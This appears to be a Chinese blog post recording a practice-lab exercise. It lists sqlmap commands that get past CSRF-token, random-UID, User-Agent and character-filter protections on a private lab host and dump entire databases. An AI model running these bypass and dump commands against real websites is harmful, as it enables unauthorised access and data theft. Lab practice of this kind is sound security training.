SQLMap绕过 Web 应用程序保护靶机(打靶记录)

jun~2025-09-26 15:24

CSRF Protection (Case #8)

sqlmap -u "http://10.22.63.5/case8.php" \

--data="t0ken=cbb99235479c0d1610c441fdf72ebd4dd3f8f8e2e95c66aeebf2018b3e087dae&id=3" \

--csrf-token="t0ken" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--level=3 \

--risk=2 \

--batch --dump-all

Random UID Protection (Case #9)

sqlmap -u "http://10.22.63.5/case9.php?id=1\&uid=1234567890" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--batch --dump-all

User-Agent Protection (Case #10)

sqlmap -u "http://10.22.63.5/case10.php" \

--data="id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--random-agent \

--batch --dump-all

Special Character Filter (Case #11)

┌──(kali㉿kali)-[~]

└─$ sqlmap -u "http://10.22.63.5/case11.php?id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--tamper="between,space2comment" \

-D nextcyber \

--dump \

--batch

相关推荐
梁洪飞8 小时前
clk学习
linux·arm开发·嵌入式硬件·arm
~光~~8 小时前
【嵌入式linux驱动——点亮led】基于鲁班猫4 rk3588s
linux·点灯·嵌入式linux驱动
yuanmenghao9 小时前
车载Linux 系统问题定位方法论与实战系列 - 车载 Linux 平台问题定位规范
linux·运维·服务器·网络·c++
浩瀚地学9 小时前
【Java】JDK8的一些新特性
java·开发语言·经验分享·笔记·学习
JeffDingAI9 小时前
【Datawhale学习笔记】深入大模型架构
笔记·学习
暖阳之下9 小时前
学习周报三十一
学习
a不是橘子9 小时前
03在Ubuntu中验证PV操作
笔记·ubuntu·操作系统·虚拟机·os·pv操作
tangyal10 小时前
渗透笔记1
笔记·网络安全·渗透
qq_5895681010 小时前
centos6.8镜像源yum install不成功,无法通过镜像源下载的解决方式
linux·运维·centos
weixin_5160230710 小时前
linux下fcitx5拼音的安装
linux·运维·服务器
热门推荐
01GitHub 镜像站点022025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04Linux下V2Ray安装配置指南05UV安装并设置国内源06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08Labelme从安装到标注:零基础完整指南09Claude Code Skills 实用使用手册10BongoCat - 跨平台键盘猫动画工具